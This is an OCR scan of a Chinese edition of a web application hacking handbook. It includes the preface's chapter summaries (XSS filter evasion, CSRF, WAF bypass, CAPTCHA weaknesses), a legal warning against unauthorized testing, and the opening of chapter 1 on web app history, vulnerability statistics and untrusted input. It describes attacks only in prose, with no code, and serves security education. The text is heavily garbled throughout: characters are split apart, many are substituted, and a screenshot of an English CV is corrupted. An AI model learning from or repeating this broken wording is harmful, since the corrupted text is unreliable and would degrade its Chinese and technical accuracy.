保护 静态 数据 ， 本 章 还 将 介绍 如 何 确 定 并 利用 加 密 提 示 来 解密 加 密 数 据 的 示例 。 

第 1 版 的 第 12 章 主要 介绍 针对 其 他 应 用 程序 用 户 的 攻击 。 第 ?版 将 这 一 章 内 容 放 到 了 两 章 中 ， 
因为 这 些 内 容 过 于 繁杂 ,不 易 管 理 。 第 12 章 主要 讨论 XSS， 相 关内 容 经 过 大 幅 改 动 。 有 关 如 何 避 
开 防 御 过 滤 以 插入 脚本 代码 的 内 容 已 完全 重 写 , 主要 介绍 一 些 新 技术 和 新 技巧 , 包括 在 当前 浏览 
器 中 执行 脚本 代码 的 各 种 鲜 为 人 知 的 方法 。 同 时 , 本章 还 将 更 详细 地 介绍 如 何 对 脚本 代码 进行 模 
糊 人 处理 ， 以 避 开 常用 的 输入 过 滤 的 方法 。 本 章 还 将 介绍 一 些 现实 中 新 出 现 的 XSS 攻 击 示 例 。 新 增 
一 广内 容 介 绍 了 如 何在 充满 挑战 的 情况 下 实施 有 效 的 XSS 攻 击 , 涵盖 如 何 将 攻击 扩散 到 所 有 应 用 
程序 页 面 、 如 何 通过 cookie 和 Referez 消 息 头 利用 XSS， 以 及 如 何在 XML 等 非 标准 请 求 和 响应 内 
容 中 利用 XSS。 此 外 ， 本 音 还 将 分 析 浏 览 需 的 内 置 XSS 过 滤 需 ， 以 及 如 何 避 开 这 些 过 滤 需 来 实施 
攻击 。 新 增 几 节 还 将 讨论 在 web 邮件 应 用 程序 和 上 传 文件 中 利用 XSS 的 特定 技巧 。 本 章 最 后 介绍 
可 用 于 阻止 XSS 攻 击 的 各 种 新 的 防御 措施 。 

第 13 章 为 新 增 的 一 章 ， 人 介绍“ 攻击 用 户 ” 这 一 涉及 广泛 的 主题 的 其 他 内 容 。 有 关 跨 站 点 请 求 
伪造 的 主题 经 过 更 新 ， 将 介绍 针对 登录 功能 的 攻击 、 反 CSRF 防 御 中 的 常见 缺陷 、UI 伪 装 攻击 ， 
以 及 破坏 框架 防御 中 的 和 常见 缺陷 。 跨 域 捕获 数据 一 方 ( 13.2 市 ) 将 介绍 如 何 通 过 注入 包含 非 脚 本 
HTML 和 CSS 的 文本 来 镭 取 数据 的 技巧 ， 以 及 各 种 使 用 JavaScript 和 E4X 跨 域 捕 获 数据 的 技巧 。 新 
增 一 节 更 详细 地 介绍 同 源 策 略 , 包括 其 在 不 同 浏览 需 扩 展 技术 中 的 实施 情况 HIMLS 市 来 的 改变 ， 
以 及 通过 代理 服务 应 用 程序 路 域 操作 的 方法 。 另 设 新 增 记 介绍 客户 端 cookie 注 入 .SQL 注入 和 HTTP 
请 求 污 染 。 有 关 客 户 闹 隐私 攻击 的 内 容 经 过 扩充 , 将 介绍 浏览 各 扩 展 技 术 和 HTML5 提 供 的 存储 机 
制 。 最 后 ， 为 一 个 新 增 节 将 集中 介绍 不 依赖 任何 特殊 应 用 程序 中 的 漏洞 、 针 对 Web 用 户 的 攻击 。 
这 些 攻击 可 以 由 任何 恶意 或 已 被 攻破 的 Web 站 点 ， 或 位 于 网 络 中 的 适当 位 置 的 攻击 者 实施 。 

第 14 章 新 增 部 分 内 容 介 绍 自动 化 攻击 过 程 中 遇 到 的 常见 障碍 ,以 及 如 何 克 服 这 些 障 得。 许多 
应 用 程序 采用 防御 性 的 会 话 处 理 机 制 来 终止 会 话 ， 使 用 临时 的 反 CSREF 令 牌 ， 或 使 用 多 阶段 过 程 
来 更 新 应 用 程序 状态 。 本 章 将 介绍 一 些 处 理 这 类 机 制 的 新 工具 , 以 便于 继续 应 用 自动 化 测试 技巧 。 
新 增 市 将 介绍 CAPTCHA 控 件 ， 以 及 一 些 通 党 能 够 加 以 利用 来 破解 这 些 控 件 的 常见 漏洞 。 




















































































































第 15 章 包含 有 关 错 误 消 息 中 的 XSS 及 利用 解密 提示 的 新 章节 。 

第 16 章 未 进行 任何 更 新 。 

第 17 草 中 的 新 增 节 主要 介绍 基于 云 的 体系 架构 中 的 漏洞 , 并 更 新 了 有 关 如 何 利 用 体系 架构 弱 
点 的 示例 。 

第 18 章 包含 在 应 用 程序 服务 硕 和 平台 中 发 现 的 一 些 有 趣 的 新 漏洞 示例 。 这 些 服务 顺和 平台 包 
括 Jetty、JMX 管 理 控制 台 、ASPNET、Apple iDisk 服 务 器 、Ruby WEBrick Web 服 务 器 和 Java Web 
服务 器 。 另 一 个 新 增 节 介 绍 突破 Web 应 用 程序 防火 墙 的 实用 方法 。 

第 19 章 未 进行 任何 更 新 。 

第 20 章 的 更 新 内 容 将 详细 介绍 基于 代理 的 工具 套件 的 最 新 功能 。 新 增 节 将 介绍 如 何 传送 不 文 
持 代理 的 客户 端的 流量 , 以 及 如 何 减 少 因 使 用 拦截 代理 服务 套 而 在 浏览 锅 和 其 他 客户 端 中 出 现 的 
SSL 错 误 。 本 章 还 将 详细 介绍 使 用 基于 代理 的 工具 套件 进行 测试 时 通常 采用 的 工作 流程 。 此 外 ， 
本 章 还 将 讨论 各 种 最 新 Web 漏 洞 扫 描 禹 及 在 各 种 情况 下 使 用 这 些 扫 摘 需 的 最 佳 方法 。 

第 21 间 的 更 新 内 容 将 介绍 在 整 本 书 中 描述 的 新 的 方法 论 步 又 。 


需要 的 工具 


本 书 着 重 讨论 渗透 测试 员 在 攻击 Web 应 用 程序 时 所 采用 的 实用 技巧 。 阅 读本 书后 ， 你 将 了 解 
每 项 攻击 任务 的 细节 、 它 们 涉及 的 技术 以 及 它们 为 什么 有 助 于 探查 和 利用 各 种 漏洞 。 下 载 茶 个 工 
具 , 使 用 它 攻击 一 个 目标 应 用 程序 ,并 根据 它 的 输出 结 末 了解 应 用 程序 的 安全 状况 ,这 些 内 容 并 
不 是 本 书 讨论 的 重点 。 

也 就 是 说 ， 当 实施 我 们 描述 的 步 又 与 搁 巧 时 ,你 会 发 现 一 些 有 用 、 有 时 其 至 是 必 不 可 少 的 工 
具 。 所 有 这 些 工 具 都 可 以 在 因特网 上 找到 ， 建 议 你 下 载 并 试用 本 书 介 绍 的 每 一 个 工具 。 


同步 网 站 内 容 


本 书 的 同步 网 站 为 http://mdsec.net/wahh ,你 还 可 以 从 www.wiley.com/go/webhackerze 链 接 到 本 
书 的 同步 网 站 , 其 上 提供 一 些 掌握 各 种 攻击 技巧 所 需要 的 有 用 资源 , 你 也 可 以 利用 这 些 资源 攻击 
真实 的 应 用 程序 。 该 网 站 主要 包括 以 下 内 容 : 

口 本 书 列 出 的 一 些 脚 本 的 源 代码 ; 

口 本 书 讨论 的 所 有 工具 和 其 他 资源 的 链接 ; 

口 攻击 一 个 第 见 应 用 程序 的 步 又 列表 

D 每 草 结束 部 分 提出 的 问题 的 答案 ; 

口 本 书 示 例 中 使 用 的 几 百 个 互动 式 漏洞 “实验 室 ”， 文 付 一 定 费 用 即 可 访问 ， 可 帮助 你 提升 

和 改善 攻击 技巧 。 



















































































其 他 说 阴 


Web 应 用 程序 安全 是 一 个 有 趣 而 流行 的 主题 。 对 我 们 而 言 ， 撰 写本 书 是 一 种 至 受 ， 正 如 每 天 
对 应 用 程序 进行 渗透 测试 。 我 们 和 希望, 在 竺 习 本 书 描述 的 各 种 攻击 技巧 和 了 解 如 何 防御 这 些 攻击 
手段 的 过 程 中 ， 你 能 够 找到 乐趣 。 

此 外 , 我 们 在 此 提出 严正 警告 。 在 许多 国家 , 未 经 所 有 者 许可 而 攻击 他 们 的 计算 机 系统 的 做 
法 属 非法 行为 。 如 末 未 经 他 人 同意 ， 执 行 我 们 摘 述 的 绝 大 多 数 技 巧 可 能 会 触犯 法 律 。 

本 书 作 者 为 专业 的 渗透 测试 员 ， 他们 代表 客户 端 对 Web 应 用 程序 实施 攻击 ， 以 帮助 强化 应 用 
程序 的 安全 。 近 年 来 ， 许 多 安全 专业 人 士 与 其 他 人 由 于 未 经 许可 而 答 试 或 主动 攻击 计算 机 系统 ， 
从 而 犯罪 , 其 职业 生涯 也 因此 结束 。 我 们 强烈 要 求 你 仅 在 法 律 许可 的 范围 内 使 用 本 书 提供 的 信息 。 
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VY 也 是 值得 关注 的 话题 。 对 相关 各 方 而 言 ， 这 一 问 
磊 部 至 天 于 要 。 这 里 的 相关 各 方 包括 因特网 业务 收入 日 益 增 长 的 公司 、 向 Web 应 用 
程序 托付 敏感 信息 的 用 户 ， 以 及 通过 急 取 支付 信息 或 人 侵 银行 账户 偷 魏 巨 突 资金 的 犯罪 分 子 。 
可 靠 的 信誉 也 非常 重要 ， 没 人 愿意 与 不 安全 的 Web 站 点 进行 交易 ， 也 没有 组 织 愿意 披露 有 关 其 
安全 方面 的 漏洞 或 违规 行为 的 详细 情况 。 因 此 ， 获 取 当 前 Web 应 用 程序 安全 状况 的 可 靠 信 息 不 
可 小 视 。 

本 章 简 要 介绍 Web 应 用 程序 的 发 展 历程 及 它们 提供 的 诸多 优点 ， 并 且 列 举 我 们 杂 号 体验 过 的 
在 目前 Web 应 用 程序 中 存在 的 源 洞 ， 这 些 漏洞 表明 绝 大 多 数 应 用 程序 还 远 远 不 够 安全 。 本 草 还 将 
描述 Web 应 用 程序 面临 的 核心 安全 问题 〈《 即 用 户 可 提交 任意 输入 的 问题 )， 以 及 造成 安全 问题 的 
各 种 因 系 。 最 后 讨论 Web 应 用 程序 安全 方面 的 最 新 发 展 趋势 ， 并 预测 其 未 来 的 发 展 方向 。 


1.1 Web 应 用 程序 的 发 展 历程 


在 因特网 发 展 的 早期 阶段 ， 万维网 (World WideWeb ) 仅 由 Web 站 点 构成 ， 这 些 站 点 基本 上 
是 包含 静态 文档 的 信息 库 。 随 后 人 们 发 明了 了 Web 浏览 器 , 通过 它 来 检索 和 显示 那些 文档 , 如 图 1-1 
所 示 。 这 种 相关 信息 流 仅 由 服务 硕 回 浏 览 硕 单 癌 传送。 多 数 站 点 并 不 验证 用 户 的 合法 性 ， 因 为 根 
本 没有 必要 这 样 做 ; 所 有 用 户 同等 对 待 ， 提 供 同 样 的 信息 。 创 建 一 个 Web 站 点 所 带 来 的 安全 威胁 
主要 与 Web 服 务 佣 软件 的 〈 诸 多 ) 漏洞 有 关 。 攻 击 者 和 人 侵 Web 站 点 并 不 能 获取 任何 敏感 信息 ， 
为 服务 硕 上 保存 的 信息 可 以 公开 查看 。 所 以 攻击 者 往往 会 修改 服务 需 上 的 文件 ， 以 牌 曲 Web 站 点 
的 内 容 ， 或 者 利用 服务 硕 的 存储 容量 和 市 宽 传 播 “非法 软件 ”。 

如 今 的 万 维 网 与 早期 的 万 维 网 已 经 完全 不 同 ，Web 上 的 大 多 数 站 点 实际 上 是 应 用 程序 ( 见 图 
1-2 )。 它 们 功能 强大 ， 在 服务 需 和 浏览 融 之 间 进 行 双 回信 息 传 送 。 它 们 文 持 注 册 与 登录 、 金 融 交 
易 、 搜 索 以 及 用 户 创作 的 内 容 。 用户 获取 的 内 容 以 动态 形式 生成 ,， 并 且 往 往 能 够 满足 每 个 用 户 的 
特殊 需求 。 它 们 处 理 的 许多 信息 属于 私密 和 高 度 敏感 的 信息 。 因 此 ， 安 全 问题 至 关 重 要 : 如 果 
人 们 认为 Web 应 用 程序 会 将 他 们 的 信息 泄露 给 未 授权 的 访问 者 , 他 们 就 会 拒绝 使 用 这 个 Web 应 用 
程序 。 






















































































第 1 章 Web 应 用 程序 安全 与 风险 


Tom 


[a C x 命 ba be ukcert.org.uk/paul 们 -用 区- cooe 只 网 -coe 有 n| 


| One i EE 局 








Dear prospective future employer, 

This 1s the CW site of 了 Paul Mlichael Wreht, Oracle Security Consultant, Developer and Forensic Analyst for NGS 
Software 也 Sutton, Surrey (South Londom where I have worked for the last two years and prewviously in a sitmilar 
role for Pentest Ltd of Cheshire. I am a non-smolung, Briish, 38 year old, rmarried man, relocatable waith no criminal 
record, disabilities or health problerms and can be 1dentiied by this photoeraph of rmy wite and 工 


Introductory summary: 

-Consulting to top bankcs andtechnology comparies on the subject of Oracle security anc general IT security. 
-Responsible for writing the Oracle secunity checks mn NGS SQOurreL for Oracle. 

-Currently the rmost qualiied SANS-GIAC person outside of US and Spain with 9 certs ncluding the GS 
specialised In Oracle Forensics. 

-Credited by Oracle In their 上 bt 2007 CPU with finding and ethically reporting a secutity wulnerabilty tn the Oracle 
RDENMS. I have five more to come in future CPU's. 

-Buthar of Oracle Farensics by Rampant Technress. ISEN -9778713-2- 记 

-Teacher for SANS of Oracle secunity, Incident Handling and lletasplolt courses. 

-Buthor of many papers Inchding a NISR paper on Oracle passwords (in Japanese), Oracle forensics for 
wulnerability detection in the SANS Reading Room and the first paper published on the svbject of Oracle Forensics at 
GIAC. 





图 1-1 包含 静态 信息 的 传统 Web 站 点 
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图 1-2” 典型 的 Web 应 用 程序 
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Web 应 用 程序 市 来 了 新 的 重大 安全 威胁 。 应 用 程序 各 不 相同 ， 所 包含 的 漏洞 也 各 不 相同 。 许 
多 应 用 程序 是 由 开发 人 员 独 立 开 发 的 ,还 有 许多 应 用 程序 的 开发 人 员 对 他 们 所 编写 的 代码 可 能 引起 
的 安全 问题 只 是 略 知 一 二 。 为 了 实现 核心 功能 , Web 应 用 程序 通常 需要 与 内 部 计算 机 系统 建立 连接 。 
这 些 系统 中 保存 着 高 度 敏感 的 数据 ,并 能 够 执行 强大 的 业务 功能 。15 年 前 ， 如果 和 需要 转账 必须 去 银 
行 ， 让 银行 职员 帮助 你 完成 区 易 。 而 今天 ， 你 可 以 访问 银行 的 Web 应 用 程序 ， 目 己 完 成 转账 交易 。 
进入 Web 应 用 程序 的 攻击 者 能 够 锣 取 个 人 信息 ， 进 行 金 融 欺 诈 或 执行 针对 其 他 用 尸 的 恶意 行为 。 



































1.1.1 Web 应 用 程序 的 弟 见 功能 


创建 Web 应 用 程序 的 目的 是 执行 可 以 在 线 完 成 的 任何 有 用 功能 。 近 些 年 出 现 的 一 些 Web 应 用 
程序 的 主要 功能 
口 购物 (Amazon ); 
口 社交 网 络 (Facebook ): 
D 银行 服务 〈Citibank ); 
口 Web 搜 索 (Google ); 
口 拍卖 (eBay ); 
口 博彩 与 投机 ( Betfair ); 
口 博客 ( Blogger ); 
口 Web 邮 件 (Gmail ); 
口 交互 信息 ( Wikipedia )。 
如 今 , 使 用 计算 机 浏览 大 访问 的 应 用 程序 的 功能 越 来 越 多 地 与 使 用 智能 手机 或 平板 电脑 访问 
的 移动 应 用 程序 的 功能 重 登 。 大 多 数 移 动 应 用 程序 都 通过 浏览 锅 或 定制 客户 端 与 服务 硕 进 行 通 
信 , 这 些 浏览 套 或 客户 端 大 多 使 用 基于 HTTP 的 API。 应 用 程序 功能 和 数据 通常 在 应 用 程序 用 于 不 
同 用 户 平 台 的 各 种 接口 之 间 共 至 。 
除 公共 因特网 外 ， 组织 内 部 已 广泛 采用 Web 应 用 程序 来 支持 关键 业务 功能 。 许 多 这 类 应 用 程 
序 可 以 访问 各 种 高 度 敏 感 的 数据 和 功能 。 
口 用 户 可 以 使 用 HR 应 用 程序 访问 工资 信息 、 提 供 并 接收 绩效 反馈 ， 以 及 管理 人 员 招 聘 和 纪 
律 处 分 程序 。 
口 连接 关键 体系 架构 ( 如 Web 和 邮件 服务 器 ) 的 管理 接口 、 用 户 工 作 站 及 虚拟 机 管理 。 
口 用 于 共享 文 要 、 管 理工 作 流 程 和 项 目 、 跟 踩 问题 的 协作 软件 。 这 些 功能 通 筑 涉及 重要 的 
安全 和 监管 问题 , 而 且 组 织 结构 大 多 完全 依赖 于 它们 的 Web 应 用 程序 内 置 的 控件 来 实现 这 
些 功能 。 
口 企业 资源 规划 ( ERP ) 软件 等 业务 应 用 程序 , 这 类 应 用 程序 以 前 使 用 专用 厚 客 户 端 应 用 程 
序 访问 ， 现 在 则 可 以 通过 Web 浏 览 冀 进行 访问 。 
口 电子 邮件 之 类 的 软件 服务 , 这 类 服务 最 初 需 要 独立 的 电子 邮件 客户 端 , 现在 可 以 通过 Web 
接口 ( 如 Outlook Web Access ) 访问 。 
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口 传统 的 加 面 办 公 应 用 程序 ( 如 文字 处 理 程序 和 电子 表格 ) 已 通过 Google Apps 和 Microsoft Office 
Live 等 服务 转换 为 Web 应 用 程序 。 

为 降低 成 本 , 组 织 逐 渐 将 各 种 任务 外 包 给 外 部 服务 提供 商 来 完成 , 因此 , 在 上 述 所 有 示例 中 ， 
我 们 所 认为 的 “内 部 ”应 用 程序 正 日 益 由 外 部 机 构 托管 。 在 这 些 所 谓 的 “ 云 ” 解 决 方案 中 ， 业 务 
关键 功能 和 数据 问 数 目 更 庞大 的 潜在 攻击 者 开放 , 而 组 织 却 越 来 越 多 地 依赖 于 不 受 其 控制 的 安全 
防御 。 

大 多 数 计 算 机 用 户 所 需要 的 客户 端 软 件 仅 仅 是 一 个 Web 应 用 程序 ， 这 样 的 时 代 即 将 来 临 。 到 
那 时 ,用 户 使 用 一 组 共享 的 协议 和 技术 即 可 执行 各 种 功能 ,但 随 之 也 会 出 现 各 种 常见 的 安全 汤 润 。 


1.1.2 ”Web 应 用 程序 的 优点 


Web 应 用 程序 越 来 越 流 行 的 原因 显而易见 。 寿 干 技术 因素 已 经 与 主要 的 商业 动机 相 结 合 ， 从 
而 引发 了 因特网 使 用 方式 上 的 重大 变 单 。 

D HTTP 是 用 于 访问 万 维 网 的 核心 通信 协议 ， 它 是 轻 量 级 的 ， 无 须 连 接 。 这 一 点 提供 了 对 通 
信和 错误 的 容错 性 。 应 用 HTTP， 许 多 传统 客户 器- 服务 器 应 用 程序 中 的 服务 絮 无 须 青 问 每 
一 个 用 户 开放 网 络 连 接 。HTTP 还 可 通过 代理 和 其 他 协议 传输 ， 人 允许 在 任何 网 络 配 置 下 进 
行 安 全 通信 。 

口 每 个 Web 用 户 都 在 其 计算 机 和 其 他 移动 设备 上 安装 了 浏览 妖 。Web 应 用 程序 为 浏览 带动 态 
部 署 用 户 界 面 , 不 必 像 以 前 的 Web 应 用 程序 那样 需要 分 配 并 省 理 独 立 的 客户 并 软件 。 界面 
变化 只 需 在 服务 右上 执行 一 次 ， 就 可 立即 生效 。 

口 如 今 的 浏览 器 功能 非常 强 大 , 可 构建 内 容 丰 宇 并 且 令 人 满意 的 用 户 界面 。Web 界 面 使 用 标 
准 导 航 和 输入 控件 ， 可 保证 用 户 即 时 熟悉 这 些 功 能 ， 而 不 需要 学 习 如 何 使 用 各 种 应 用 程 
序 。 应 用 程序 可 通过 客户 端 脚本 功能 将 部 分 处 理 交 由 客户 端 完成 ， 必 要 时 ， 可 使 用 厚 客 
户 端 组 件 任 意 扩 展 浏览 右 的 功能 。 

口 用 于 开发 Web 应 用 程序 的 核心 技术 和 语言 相对 简单 。 即 使 是 初学 者 , 也 可 使 用 现 有 的 各 种 
平台 和 开发 工具 ， 开 发 出 强大 的 应 用 程序 ， 还 有 大 量 开 源 代 码 和 其 他 资源 可 供 整 合 到 定 
制 的 应 用 程序 中 。 


1.2 Web 应 用 程序 安全 


与 任何 新 兴 技 术 一 样 ，Web 应 用 程序 也 会 市 来 一 系列 新 的 安全 方面 的 漏洞 。 这 些 第 见 的 缺 陶 
也 在 “与 时 俱 进 "， 一 些 开发 人 员 在 开发 现 有 应 用 程序 时 未 曾 考 虑 到 的 攻击 方式 都 相继 出 现 了 。 
由 于 安全 意识 的 加 强 ， 一些 问题 已 经 得 到 解决 。 新 拉 术 的 开发 也 会 引入 新 的 源 润 。Web 浏 览 带 软 
件 的 改进 基本 上 消除 了 某 些 缺陷 。 

针对 Web 应 用 程序 的 最 严重 攻击 , 是 那些 能 够 披露 敏感 数据 或 获取 对 运行 应 用 程序 的 后 端 系 
统 的 无 限 访问 权限 的 攻击 。 这 类 倍 受 瞩目 的 攻击 经 党 发 生 , 但 对 许多 组 织 而 言 ， 任 何 导 致 系统 中 
里 的 攻击 都 属于 重大 事件 。 通过 实施 应 用 程序 级 拒绝 服务 攻击 ,可 以 达到 与 针对 基础 淋 构 的 传统 




























































































1.2 Web 应 用 程序 安全 $ 











痪 源 耗 绚 攻 击 相同 的 目的 。 但 是 , 实施 这 些 攻击 通常 需要 更 精细 的 操作 , 并 主要 针对 特定 的 目标 。 
例如 ， 可 以 利用 这 些 攻击 破坏 特定 用 户 或 服务 ， 从 而 在 金融 贸易 、 赠 博 、 在 线 招 投标 和 订 采 等 领 
域 左 得 元 争 优 势 。 

在 整个 发 展 过 程 中 ,不 时 有 报道 知名 Web 应 用 程序 被 攻破 的 消 肯 。 傅 况 似乎 并 未 好 转 ， 也 没 
有 迹象 表明 这 些 安 全 问题 已 经 得 到 解决 。 可 以 说 ， 如 今 的 Web 应 用 程序 安全 领域 中 攻击 者 与 计算 
机 资源 和 数据 防御 者 之 间 最 重要 的 战场 ， 在 可 预见 的 将 来 ， 这 种 情况 可 能 仍 将 持续 。 


1.2.1 “本 站 点 是 安全 的 ” 


人 们 普遍 认识 到 ， 对 Web 应 用 程序 而 言 ， 安 全 确实 是 个 “问题 ”。 查 询 一 个 典型 的 应 用 程序 
的 FAQ 页 面 ， 其 中 的 内 容 会 癌 你 保证 该 应 用 程序 确实 是 安全 的 。 
大 多 数 Web 应 用 程序 都 声称 其 安全 可 靠 ， 因 为 它们 使 用 SSL， 例 如 : 
本 站 点 绝对 安全 。 它 使 用 128 位 安全 套 接 层 (Secure Socket Layer, SSL ) 技术 设计 ， 可 防止 未 
授权 用 户 查 看 您 的 任何 信息 。 您 可 以 放心 使 用 本 站 点 ， 我 们 绝对 保障 您 的 数据 安全 。 
Web 应 用 程序 常常 要 求 用 户 核 实 站 点 证 书 , 并 想方设法 让 用 户 相 信和 其 所 采用 的 先进 加 密 协 议 无 懈 
可 击 ， 从 而 说 服用 户 放心 地 向 其 提供 个 人 信息 。 
此 外 ， 各 种 组 织 还 声称 他 们 遵循 支付 卡 行业 (PCI ) 标准 ， 以 消除 用 户 对 安全 问题 的 担忧 。 
例如 : 
我 们 极其 注重 安全 ， 每 天 扫描 Web 站 点 ， 以 确保 始终 遵循 PCI 标 准 ， 并 免 受 黑客 攻击 。 下 面 
的 标志 上 显示 了 最 近 扫 描 日 期 ， 请 放心 访问 该 Web 站 点 。 
实际 上 ， 大 多 数 Web 应 用 程序 并 不 安全 ,虽然 SSL 已 得 到 广泛 使 用 ， 晶 会 定期 进行 PCI 扫 描 。 
最 近 几 年 , 我 们 测试 过 数 百 个 Web 应 用 程序 。 网 1-3 说 明了 在 2007 年 和 2011 年 间 测 试 的 应 用 程序 受 
一 些 常见 类 型 的 漏洞 影响 的 比例 。 下 面 简要 说 明 这 些 漏 洞 。 
口 不 完善 的 身份 验证 措施 (62%)。 这 类 漏洞 包括 应 用 程序 登录 机 制 中 的 各 种 缺陷 ， 可 能 会 
使 攻击 者 破解 保密 性 不 强 的 密码 、 发 动 蛮 力 攻击 或 完全 避 开 登录 。 
口 不 完善 的 访问 控制 措施 《71%)。 这 一 问题 涉及 的 情况 包括 : 应 用 程序 无 法 为 数据 和 功能 
提供 全 面 保护 , 攻击 者 可 以 查看 其 他 用 户 保 存在 服务 器 中 的 敏感 信息 ,或 者 执行 特权 操作 。 
口 SQL 注入 〈32% )。 攻 击 者 可 通过 这 一 漏洞 提交 专门 设计 的 输入 ， 干 扰 应 用 程序 与 后 端 数 
据 库 的 交互 活动 。 攻 击 者 能 够 从 应 用 程序 中 提取 任何 数据 、 人 破坏 其 逻辑 结构 ， 或 者 在 数 
据 库 服务 器 上 执行 命令 。 
口 跨 站 点 脚本 〈94% )。 攻 击 者 可 利用 该 漏洞 攻击 应 用 程序 的 其 他 用 户 、 访 问 其 信息 、 代 表 
他 们 执行 未 授权 操作 ， 或 者 向 其 发 动 其 他 攻击 。 
口 信息 泄露 (78%)。 这 一 问题 包括 应 用 程序 泄露 敏感 信息 ， 攻 击 者 利用 这 些 敏感 信息 通过 
有 缺陷 的 错误 处 理 或 其 他 行为 攻击 应 用 程序 。 
口 跨 站 点 请 求 伪 造 〈《92%)。 利 用 这 种 漏洞 ， 攻 击 者 可 以 诱 使 用 户 在 无 意 中 使 用 自己 的 用 户 
权限 对 应 用 程序 执行 操作 。 亚 意 Web 站 点 可 以 利用 该 漏洞 , 通过 受害 用 户 与 应 用 程序 进行 
交互 ， 执 行 用 户 并 不 打算 执行 的 操作 。 
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0% 10% 20% 30% 40% 30% 60% 70% 80% 90% 100% 
各 种 漏洞 在 最 近 测 试 的 应 用 程序 中 的 出 现 频率 


图 1-3 ”我 们 最 近 测 试 的 应 用 程序 中 出 现 的 一 些 常 见 Web 应 用 程序 犹 洞 〈 基 于 100 多 个 样本 ) 


SSL 是 一 种 出 色 的 技术 ， 可 为 用 户 浏览 硕 和 Web 服 务 需 间 传 输 的 数据 提供 机 密 性 与 完整 性 保 
护 功 能 。 它 有 助 于 防止 信息 泄露 ， 并 可 你 证 用 户 处 理 的 Web 服 务 骨 的 安全 性 。 但 SSL 并 不 能 抵御 
百 接 针 对 茶 个 应 用 程序 的 服务 融 或 客户 奖 组 件 的 攻击 ， 而 许多 成 功 的 攻击 神 恰 恰 属 于 这 种 类型 。 
特别 需要 指出 的 是 ，SSL 并 不 能 阻止 上 述 任何 漏洞 或 许多 其 他 使 应 用 程序 受到 威胁 的 漏洞 。 无 论 
是 否 使 用 SSL， 大 多 数 Web 应 用 程序 仍然 存在 安全 漏洞 。 


1.2.2 ”核心 安全 问题 : 用 户 可 提交 任意 输入 


与 多 数 分 布 式 应 用 程序 一 样 ， 为 确保 安全 ，Web 应 用 程序 必须 解决 一 个 根本 的 问题 。 由 于 应 
用 程序 无 法 控制 客户 器, 用 户 几 乎 可 回 服务 带 病 应 用 程序 提交 任意 输入 。 应 用 程序 必须 假设 所 有 
输入 的 信息 都 是 恶意 的 输入 ， 并 必须 采取 措施 确保 攻击 者 无 法 使 用 专门 设计 的 输入 破坏 应 用 程 
序 , 干扰 其 逻辑 结构 与 行为 ,并 最 终 达 到 非法 访问 其 数据 和 功能 的 目的 。 

这 个 核心 问题 表现 在 许多 方面 。 

口 用 户 可 干预 客户 并 与 服务 带 间 传送 的 所 有 数据 ， 包 括 请 求 参数 、cookie 和 HTTP 信 息 头 。 

可 轻易 避 开 客户 端 执 行 的 任何 安全 控件 ， 如 输入 确认 验证 。 
口 用 户 可 按 任何 顺序 发 送 请 求 ,并 可 在 应 用 程序 要 求 之 外 的 不 同 阶 段 不 止 一 次 提交 或 根本 不 提 
区 参数 。 用 户 的 操作 可 能 与 开发 人 员 对 用 户 和 应 用 程序 交互 方式 做 出 的 任何 假设 完全 不 同 。 
口 用 户 并 不 限于 仅 使 用 一 种 Web 训 览 锅 访问 应 用 程序 。 大 量 各 种 各 样 的 工具 可 以 协助 攻击 
Web 应 用 程序 , 这 些 工 具 既 可 整合 在 训 览 厅 中 , 也 可 独立 于 浏览 融 运 作 。 这 些 工具 能 够 提 
出 普通 浏览 带 无 法 提交 的 请 求 ， 并 能 够 迅速 生成 大 量 的 请 求 ， 碍 找 和 利用 安全 问题 达到 
目 己 的 目的 。 

































































1.2 Web 应 用 程序 安全 了 





绝 大 多 数 针对 Web 应 用 程序 的 攻击 都 涉及 向 服务 需 提 交 输 入 ， 旨 在 引起 一 些 应 用 程序 设计 者 
无 法 预料 或 不 希望 出 现 的 事件 。 以 下 举例 说 明 为 实现 这 种 目的 而 提交 的 专门 设计 的 输入 。 

口 更 改 以 隐藏 的 HTML 表 单字 上 段 提 交 的 产品 价格 ， 以 更 低廉 的 价格 欺诈 性 地 购买 该 产品 。 

口 修改 在 HTTP cookie 中 传送 的 会 话 令 牌 ， 动 持 另 一 个 验证 用 户 的 会 话 。 

口 利用 应 用 程序 处 理 过 程 中 的 逻辑 错误 删除 某 些 正常 提交 的 参数 。 

口 改变 由 后 端 数据 库 处 理 的 某 个 输入 ， 从 而 注入 一 个 恶意 数据 库 查 询 以 访问 敏感 数据 。 

纪 良 置疑 ，SSL 无 法 阻止 攻击 者 加 服务 需 提 交 专 门 设计 的 输入 。 应 用 程序 使 用 SSL 仅 仅 表示 
网 络 上 的 其 他 用 户 无 法 查看 或 修改 攻击 者 传送 的 数据 。 因 为 攻击 者 控制 着 SSL 通 道 的 终端 ， 能 够 
通过 这 条 通道 向 服务 需 传 送 任何 内 容 。 如 果 前 面 提 到 的 任何 攻击 成 功 实 现 , 那么 不 论 其 在 FAQ 中 
声称 其 如 何 安全 ， 该 应 用 程序 都 很 容易 受到 攻击 。 


1.2.3 关键 问题 因素 


任何 情况 下 ， 如 果 一 个 应 用 程序 必须 接受 并 处 理 可 能 为 恶意 的 未 经 验证 的 数据 ， 就 会 产生 
Web 应 用 程序 面临 的 核心 安全 问题 。 但 是 ， 对 Web 应 用 程序 而 言 ， 几 种 因素 的 结合 使 问题 更 加 严 
重 ， 这 也 解释 了 当今 因特网 上 许多 Web 应 用 程序 无 法 很 好 地 解决 这 一 问题 的 原因 。 

1. 不 成 熟 的 安全 意识 

近年 来 ， 人 们 对 Web 应 用 程序 安全 问题 的 意识 有 所 增强 ,但 与 网 络 和 操作 系统 这 些 发 展 更 加 
完善 的 领域 相 比 ， 人 们 对 Web 应 用 程序 安全 问题 的 意识 还 远 不 够 成 熟 。 虽 然 大 多 数 IT 安全 人 员 党 
握 了 相当 多 的 网 络 安全 与 主机 强化 基础 知识 , 但 他 们 对 与 Web 应 用 程序 安全 有 关 的 许多 核心 概念 
仍然 不 其 了解 ， 甚 至 存 有 误解 。 当 前 ， 在 其 工作 中 ，Web 应 用 程序 开发 人 员 往往 需要 整合 数 十 、 
甚至 数 百 个 第 三 方 数据 包 ， 导 致 他 们 无 法 集中 精力 研究 基础 技术 。 即 使 是 经 验 丰富 的 Web 应 用 程 
序 开发 人 员 , 也 经 常会 对 所 用 的 编程 框架 的 安全 性 做 出 错误 假设 ,或 遇 到 一 些 对 他 们 而 言 完全 隙 
生 的 基本 缺陷 类 型 。 

2. 独立 开发 

